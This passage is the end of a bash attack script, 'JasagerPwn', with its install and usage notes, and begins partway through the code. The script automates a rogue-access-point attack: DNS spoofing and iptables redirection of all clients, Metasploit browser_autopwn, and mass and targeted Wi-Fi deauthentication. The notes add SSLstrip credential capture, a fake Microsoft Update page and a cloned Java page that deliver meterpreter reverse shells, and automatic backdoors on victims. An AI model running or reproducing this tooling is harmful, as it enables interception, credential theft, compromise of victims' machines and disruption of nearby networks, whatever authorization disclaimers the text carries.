conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." 
elif [ $browserpwn -eq 0 ]; then if [ $autoMetScript -eq 1 ]; then metScript; fi xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version" -e "msfconsole -r /tmp/msfrcBP" & #xterm -geometry 110x42+464-38 -bg black -fg green -T "[leg3nd-BrowserPwn] v$version - WebServer" -e "msfcli auxiliary/server/browser_autopwn LHOST=$ourIP SRVPORT=80 SRVHOST=$ourIP URIPATH=/ E" & sleep 25 echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." ipTableRedirect #iptables -t nat -A PREROUTING -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & echo -e "\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $ourIP:80..." browserpwn="1" fi while true do if [ $fakeupdate -eq 1 ]; then break; fi if [ $javaATK -eq 1 ]; then break; fi echo echo -e "\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m" echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE2 #read -r -p "[?] 
Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE2 case $USR_CHOICE2 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & browserpwn="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!" echo -e "\e[01;33m[!]\e[00m Dont Forget To Run 'ipconfig /flushdns' On Victim!!" break ;; M|m|Menu|menu|2) echo -e "\e[01;33m[!]\e[00m Please kill Browser AutoPwn jobs in metasploit, or close it." break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; D|d|deauth|Deauth|DeAuth|5) attackCheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` while true do echo echo -e "\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m" echo -e "\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth" echo -e "\e[01;33m[!]\e[00m [4][K]ill [5][M]ain menu" #read -r -p "[?] 
Please enter [ A | D | S | K | M ]: " USR_CHOICE3 echo -e -n "\e[01;33m[!]\e[00m Choose From Above: " read -e USR_CHOICE3 case $USR_CHOICE3 in A|a|airodrop|Airodrop|1) if [ -e "/usr/bin/airdrop-ng" ]; then if [ -e "/tmp/cap-01.csv" ]; then rm /tmp/cap-* ; fi sleep 2 xterm -geometry 90x30+464+0 -bg black -fg green -T "[JasagerPwn-Airodump] Capturing APs" -e "airodump-ng -w /tmp/cap -o csv $MIFACE" & AIRDUMPID=`echo $!` sleep 10 xterm -geometry 75x12+464+418 -bg black -fg green -hold -T "[JasagerPwn-Airdrop Attack] v$version" -e "airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv" & AIRDROPID=`echo $!` else echo echo -e "\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this." echo -e "\e[01;31m[!]\e[00m Please go to /pentest/wireless/airdrop-ng and run install.py." fi ;; D|d|deauth|DeAuth|2) #if [ ! $ATKcheck ]; then # xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" & # sleep 4 #fi xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-MassDeauth.sh] v$version" -e "chmod +x src/deauth.sh && bash src/deauth.sh" & DEAUTHPID=`echo $!` ;; S|s|single|Single|3) #if [ ! $ATKcheck ]; then # xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "#airmon-ng start $WIFACE" & # sleep 4 #fi xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "killall -9 aireplay" & xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng $MIFACE" & airID=`echo $!` echo read -r -p "[?] Enter the target APs BSSID: " TBSSID kill $airID read -r -p "[?] Do You want a specific client? [ Y | N ]: " DMODE case $DMODE in y|Y|Yes|yes|1) xterm -geometry 95x47+577+0 -hold -bg black -fg green -T "[CLOSE MANUALLY] - Airodump Capture" -e "airodump-ng --bssid $TBSSID $MIFACE" & echo read -r -p "[?] 
Enter the target Client MAC: " CMAC xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE" & ;; n|N|No|no|2) xterm -geometry 75x12+464+265 -bg black -fg green -T "[JasagerPwn-Manual DeAuth] v$version" -e "aireplay-ng -0 20 -D -a $TBSSID $MIFACE" & ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac #take in information from dump for aireplay ;; K|k|kill|Kill|4) xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID" & xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID" & ;; M|m|menu|Menu|5) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; N|n|Network|network|net|6) while true do echo echo -e "\e[01;33m[MODE][==================-Network Settings-====================][!]\e[00m" echo -e "\e[01;33m[!]\e[00m [1][I]nterface [2][D]eAuth Config" echo -e "\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain menu" echo -e -n "\e[01;33m[!]\e[00m Choose From Above: " read -e USR_CHOICE99 case $USR_CHOICE99 in I|i|interface|Interface|1) read -r -p "[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: " USR_CHOICE98 case $USR_CHOICE98 in #Connecting to WIFI y|Y|Yes|yes|1) xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" #kill $dnsID2 >/dev/null 2>&1 echo read -p "[!] Connect to WiFi Network THEN Press [Enter] .." echo echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE" read -r -p "[?] 
Please Enter the New Gateway Interface: " NEWIFACE IFACE=`echo $NEWIFACE` if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then IPTABLES elif [ $sniffing -eq 1 ]; then ipTableRedirect elif [ $browserpwn -eq 1 ]; then ipTableRedirect elif [ $fakeupdate -eq 1 ]; then ipTableRedirect elif [ $javaATK -eq 1 ]; then ipTableRedirect fi while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 & sleep 2 && dnsID2=`echo $!` wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'` echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf ;; #Connecting to HARDWIRE n|N|No|no|2) #kill $dnsID2 >/dev/null 2>&1 xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" echo echo -e "\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE" read -r -p "[?] Please Enter the New Gateway Interface: " NEWIFACE IFACE=`echo $NEWIFACE` if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then IPTABLES elif [ $sniffing -eq 1 ]; then ipTableRedirect elif [ $browserpwn -eq 1 ]; then ipTableRedirect elif [ $fakeupdate -eq 1 ]; then ipTableRedirect elif [ $javaATK -eq 1 ]; then ipTableRedirect fi #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done >/dev/null 2>&1 & echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & sleep 2 && dnsID2=`echo $!` ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." 
esac ;; D|d|deauth|DeAuth|2) xterm -geometry 95x47+577+0 -bg black -fg green -T "[EDITING] Airdrop DeAuth Config" -e "nano /tmp/deauth.conf" echo echo -e "\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes." ;; R|r|refresh|Refresh|3) xterm -geometry 75x12+464+288 -bg black -fg green -T "[JasagerPwn-DeAuth Kill] v$version" -e "ifconfig $IFACE up && dhclient $IFACE" sleep 3 gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` xterm -geometry 75x12+464+288 -bg black -fg green -T "[ResolvLoop Kill] v$version" -e "killall -9 /tmp/resolv.sh" & #while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &> /dev/null & echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & sleep 2 && dnsID2=`echo $!` ;; M|m|menu|Menu|4) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; X|x|exit|Exit|7) cleanup ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done cleanup ####################################################################################### INSTALL_HOWTO: ================================ JasagerPwn Attack Vector Script -------------------------------- leg3nd @ info-s3curity.com -------------------------------- Bugs @ hak5 forums or via email dgriffin831@gmail.com -------------------------------- ================================ General Description: This is a fairly basic bash script used to automate multiple attack vectors using Jasager/Karma on a Fon router. The script is designed to be error coded and seamless in terms of switching access and attacks at will. I have found it to be extremely useful in pentest scenarios becuase of all the time saved doing basic setup for attacks manually. 
Use at your own risk, and only against networks and clients you are explicitly authorized to test: deauthenticating third-party clients and intercepting their traffic is unlawful in most jurisdictions without written permission. -This script assumes you are using BackTrack 4 with /pentest/; if your tools live somewhere else, adjust the paths accordingly. The following dependencies are required for full functionality of the script... Dependencies: PHP5, Apache2, Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection. Step 1: Ensure you have everything needed. ------------------------------------------ apt-get install php5 dhcp3-server macchanger dsniff aircrack-ng apache2 twisted-web libapache2-mod-php5 cd /pentest/exploits/SET/ && python install.py cd /pentest/wireless/airdrop-ng/ && python install.py - Make sure SSLstrip is installed with the same method; I think it is by default in bt4. If it isn't working, this is how to install it (note the tarball is fetched over plain HTTP, so verify its checksum or signature against the author's published value before installing it as root): cd /pentest/ wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz tar xvf sslstrip-0.7.tar.gz cd sslstrip-0.7/ python setup.py install Step 2: Adjust the script variables. ------------------------------------ - Open up the script in your favorite editor and look over all the variables and their comments. - If you are not using bt4 you may need to adjust the SET and MSF directories. - Set up the correct interfaces according to your setup. - Set the 'fonIP' variable to an available IP on the FON's subnet. - I recommend setting up the 'metScript' function to automatically do what you need on your victims; by default this is set to "0" and uses reverse_tcp_dns backdoors. Keep an inventory of every host where persistence was installed so it can be removed at the end of the engagement. Step 3: Setup FON ------------------ - We need to remove DHCP on the FON because we will be running it from the computer instead. - If you are using some other DHCP service you may also need to disable that. /etc/init.d/dnsmasq stop /etc/init.d/dnsmasq disable That's it! If everything is done correctly, and assuming the system has the correct versions of python and ruby, you should be good to go.
======================= Included Attacks ======================= SSLstrip/Sniffing: By default it will always be running dsniff, driftnet, and urlsnarf because they are seamless to the users anyway. The SSLstrip/sniffing attack does not steal certificates: it rewrites https:// links to http:// as clients browse, so logins that would have gone over TLS are sent in the clear. It works on most sites that still serve an HTTP page or redirect; sites the client already knows via HSTS are not affected. The captured traffic is followed, saved, and parsed for login credentials; treat those logs as sensitive evidence and restrict who can read them. SSLstrip is set to use port 10000 and will be paused when using other attacks. FakeUpdate (by g0tmi1k): Redirects the WLAN to a fake Microsoft Update page hosted in Apache with a generated meterpreter reverse_tcp payload. This currently only has download support for MS clients. BrowserPwn: This redirects the WLAN to a Metasploit browser_autopwn server. This is fairly noisy - it throws every exploit available for that browser at the client to gain a reverse_tcp meterpreter session, which can crash the victim's browser and is easily picked up by an IDS. This works on any OS. JavaPwn: This redirects the WLAN to a SET-generated Java page with a reverse_tcp meterpreter Java applet. It asks to 'run' the applet while on a cloned/modified version of the Java download page. Cloned pages include Google and a fake Sun Java page. Keep in mind that cloned pages need to have images, scripts, and CSS hosted LOCALLY to work. -This attack vector is included with 2 templates in the script (Google and a "Java required" page). -KEEP IN MIND - When combining the "clone website" feature of SET with these iptables rules, the template will be broken because images cannot be pulled from the remote server. I manually edited the sites to work. DeAuth: There are a few different de-authentication attacks included in the script. -The most effective is airdrop-ng, a client- and rule-based mass deauth tool. It is set to deauth every AP around you except your AP and your wireless card (so you can tunnel via wireless); scope the rules to the BSSIDs that are actually in your engagement before starting it, since the default hits every neighbouring network.
-I normally keep a terminal open in /tmp (where the script creates its config files at startup), and you may manually edit the deauth configuration as needed. It will not reset until the whole script restarts. Note that these files live in world-writable /tmp under fixed names and are read by a root process, so on a shared machine another local user could alter them; use a dedicated box or a private directory if that matters in your environment. -"Mass DeAuth" is a rather simple bash script which uses iwscan to gather AP information and sends out deauth packets via 'aireplay-ng -0'; this is sent to the AP itself (broadcast), and is not client based. -Single DeAuth is just a normal deauth attack, for when you want to be a little stealthier and pick off specific clients.